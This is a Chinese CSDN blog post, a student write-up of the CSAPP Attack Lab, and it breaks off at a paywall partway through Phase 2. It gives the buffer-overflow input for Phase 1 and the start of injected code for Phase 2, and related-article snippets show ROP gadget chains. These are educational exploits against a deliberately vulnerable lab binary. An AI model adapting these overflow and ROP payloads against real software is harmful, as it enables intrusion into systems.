【深入理解计算机系统csapp lab】attacklab

最新推荐文章于 2024-05-25 18:58:05 发布
最新推荐文章于 2024-05-25 18:58:05 发布
阅读量1.1k 收藏 2
点赞数 2
分类专栏: csapp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hazel1313/article/details/109824031
版权
Attack labAttack lab的handout写的非常详细,容易上手。一共分为两部分:第一部分是code injection attack,有3个phase;第二部分是return-oriented programming,需要在已有的程序里找需要执行的指令来完成整个程序,有2个phase。Phase 1:在这部分需要做的工作很简单,利用缓存区溢出,把位于getbuf栈帧底部的返回地址改为函数touch1的地址即可。在反汇编的代码中找到getbuf函数:00000000004017a8
摘要由CSDN通过智能技术生成

Attack lab

Attack lab的handout写的非常详细,容易上手。一共分为两部分:第一部分是code injection attack,有3个phase;第二部分是return-oriented programming,需要在已有的程序里找需要执行的指令来完成整个程序,有2个phase。

Phase 1:
在这部分需要做的工作很简单,利用缓存区溢出,把位于getbuf栈帧底部的返回地址改为函数touch1的地址即可。
在反汇编的代码中找到getbuf函数:

00000000004017a8 <getbuf>:
  4017a8:	48 83 ec 28          	sub    $0x28,%rsp

可以看到分配的缓存区大小是0x28,,也就算40个字节。
也就是我们需要输入40个字节+目标地址(touch1)。

00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
c0 17 40

注意小端存储模式是低位在低地址,先输入,所以地址的输入顺序应该是按字节反过来的。

Phase 2:
这一关不但要跳转到函数touch2,还要在这之前传递指定参数。
思路是:在缓冲区中注入代码,并将原本的函数返回地址重定向到我们注入的代码。
注入的代码是:

   48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi  //将cookie赋值给rdi(传参)
   68 ec 17 40 0
最低0.47元/天 解锁文章
hazel1313
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
深入理解计算机系统》csapp实验七Molloc Lab 测试文件
07-08
深入理解计算机系统》(CSAPP)是一本广泛认可的计算机科学教材,它涵盖了计算机系统的多个核心主题,包括硬件、操作系统、编译器以及内存管理等。Molloc Lab是该书实验部分的一个章节,专注于内存管理,特别是内存...
深入理解计算机系统 CSAPP
10-29
深入理解计算机系统》(英文原版为"Computer Systems: A Programmer's Perspective",简称CSAPP)是一本经典的计算机科学教材,它详细介绍了计算机系统的各个方面,对于程序员和计算机专业人士来说,是一本不可或...
attacklab_phase5
w112348的博客
06-30 717
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 1a 40 00 /* 1 <addval_190> movq %rsp,%rax */ 00 00 00 00 a2 19 40 00 /* 2 <addval_273> movq %rax,%rdi */ 00 00 00 00 ab.
【CSAPP】AttackLab
朝花夕拾
11-03 2万+
这份史上最全的CSAPP之AttackLab实验讲解汇总绝对是攻克这一难题的最佳利器!无论你是刚刚踏入计算机科学的大门,还是已经是一位经验丰富的程序员,这万字详解都将对你产生深远的影响。从最基础的概念到高级的技巧,每一个步骤都被超全面、超详细地剖析。这篇文章是你攻克CSAPP AttackLab的不二之选,不容错过!收藏它,它将成为你的最佳学习伴侣,引领你通往计算机科学的精彩世界!
AttackLab实验记录
最新发布
zxj9_9_5__9_7的博客
05-25 798
AttackLab实验记录
CSAPP-AttackLab实验
weixin_52511526的博客
06-06 2986
在程序运行过程中,基于注入攻击代码和面向返回的编程攻击这俩大块内容,通过字符串填充的方式,完成5个阶段的缓冲区攻击。分别基于基本返回地址填充、攻击代码填充、ROP等实现这5个难度递增的阶段的缓冲区溢出攻击。
CSAPP 3e Attack lab
热门推荐
lijun538的专栏
02-17 4万+
总结一下CSAPP第三版的attack lab
AttackLab 这次我偷懒了
weixin_30741653的博客
05-21 417
这里有题解,这里有题解,这里有题解 迅速暴击上面一行,,,,, 感谢男神LJL 留几张图 第一次lab结束的时候还是12点之前,感人 (PS:本篇好水,, (反正没人看,(逃 转载于:https://www.cnblogs.com/cww97/p/7534000.html...
CSAPP Lab3 attacklab实验源材料
11-07
CSAPP Lab3 attacklab实验源材料 深入理解计算机系统实验三缓冲区溢出攻击实验源材料
深入理解计算机系统 CSAPP 思维导图 哈工大 854
01-24
本人对 CSAPP 做的导图 参考资料主要来源于 CSAPP 和 哈工大 PPT
深入理解计算机系统(CSAPP) 英文原版(完整版!!!)
02-22
深入理解计算机系统》(英文原版,Complete Edition)是一本深受全球IT专业人士推崇的经典教材,由Randal E. Bryant和David R. O'Hallaron合著。这本书以深入浅出的方式介绍了计算机系统的各个方面,包括硬件、...
AttackLab实验-计算机系统基础-gddrxy
03-30
实验原理与内容 “AttackLab”是一个Linux下的可执行C程序,包含了5个阶段(phase1~phase5)的不同内容。程序运行过程中,要求学生能够根据缓冲区的工作方式和程序的反汇编代码来确定攻击字符串长度和字符串中的关键内容。每次成功实现缓冲区溢出攻击时都会有提示相应内容,如果攻击失败则单纯的提示segmentation fault相关信息。 要求攻击字符串的执行不许绕开代码中的validate函数,缓冲区溢出之后对应ret的返回地址可以是以下类型: 1.函数touch1、touch2、touch3的首地址; 2.自行注入的攻击的首地址; 3.在后两个阶段中(ROP攻击),与farm.c的对应的可利用的gadget的起始地址,farm.c对应的机器码已经包含在可执行文件中。可以使用的gadget首地址需处于start_farm和end_farm之间的部分。 注意:前三个阶段使用ctarget作为攻击目标文件,后两个阶段中使用rtarget作为攻击目标文件。 每个阶段考察一个缓冲区溢出方式,难度逐级递增:  阶段1:使用非ROP方式对ctarget进行攻击,调用touc
[笔记]计算机基础 4 CSAPP Lab3-AttackLab
Leafing_的博客
04-06 608
总结想说的貌似都在BombLab里说了,只能鼓励自己继续读第4章了。
CSAPP Attack Lab
weixin_62709318的博客
11-23 288
本关我们需要跳转到touch3, 传入touch3的参数是一个字符串,并且这个地址指向的字符串要与cookie的字符串表示相同,在汇编语言中传入的第一个参数存放在rdi寄存器里面,所以我们不仅要将这串字符串放入栈中,我们还要讲rdi的值设置为字符串的首地址。00 00 00 00 00 00 00 00 # 前0x28个字符填充0x00。00 00 00 00 00 00 00 00 # 前0x28个字符填充0x00。fa 18 40 00 00 00 00 00 # touch3地址。
二、Attack Lab
weixin_44519904的博客
08-11 283
​ ​ 利用缓冲区溢出来注入攻击代码.通常,给程序输入字符串,其包含可执行代码的字节编码,一些攻击代码可能会覆盖栈中的返回地址,那么,执行ret指令的效果就是转跳到攻击代码.​ ​ 当栈随机化或者限制可执行代码区域时,就可以使用该方法执行攻击代码(因为返回地址不可知),也就是利用程序本身的代码攻击程序,带有ret指令段的称谓gadget.(例子可以查看帮助文档ROP部分)​ ​call指令将返回地址压入堆栈,再把被调用过程的地址复制到指令指针寄存器(rip).当过程准备返回时,它的ret。...
计算机系统基础实验2——bomb
Mr_dimple的博客
11-16 6412
实验介绍 使用课程知识拆除一个“Binary Bombs”来增强对程序的机器级表示、汇编语言、调试器和逆向工程等理解。 一个“Binary Bombs”(二进制炸弹,简称炸弹)是一个Linux可执行C程序,包含phase1~phase6共6个阶段。 炸弹运行各阶段要求输入一个字符串,若输入符合程序预期,该阶段炸弹被“拆除”,否则“爆炸” 。 实验目标是你需要拆除尽可能多的炸弹。 实验步骤: 第一步:反汇编 将自己的炸弹文件复制到share目录下 解压炸弹文件,并 cd 到解压出的子目录 对bomb进行
深入理解计算机系统(3)——attack lab
学渣日记
05-08 1975
目录用到的指令第一部分:Code Injection Attacksphase 1phase 2phase 3第二部分:Return-Oriented Programming Attacksphase 4phase 5 用到的指令 名字 用途 ./hew2raw <1.txt> p1.txt 将攻击字符串转化为可读取格式 gcc -c 1.s 编译生成1.o文件 objdump -d 1.o(or ctarget)>1.txt 反汇编输出含机器码的语句 ./ct
attack lab
u013129143的博客
03-23 1338
Level1 在getbuf 设置断点 输入 12345678901234567890 使用 info reg 查看寄存器 rsp此时指向的内存地址 存储的应该是"1234 5678" 相对应的ascii 应该是 0x31 0x32 0x33 0x34 0x35 0x36 0x37 0x38 使用x /48x $rsp 验证一下 (字符串是顺序存放 如果存放的"12345678"是Int...
深入理解计算机系统csapp】 attack lab实验四
m0_52427832的博客
04-24 5723
文章目录前置知识栈布局以及栈增长方向缓冲区溢出示例准备工作CI:代码注入攻击phase_1phase_2phase_3ROP:面向返回的编程phase_2phase_3参考文章hex2raw的使用生成字节代码 前置知识 栈布局以及栈增长方向 缓冲区溢出示例 准备工作 反汇编两个需要做的文件 objdump -d ctarget > ctarget.txt objdump -d rtarget > rtarget.txt 得到了两个新文件ctarget.txt和rtarget.txt
深入理解计算机系统csapp练习题
07-07
深入理解计算机系统(CSAPP)》是计算机科学领域的经典教材之一,对于深入理解计算机系统的原理、设计和实现起到了极大的帮助。在阅读这本书的过程中,书中的习题也是非常重要的一部分,通过做习题,我们可以更好...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值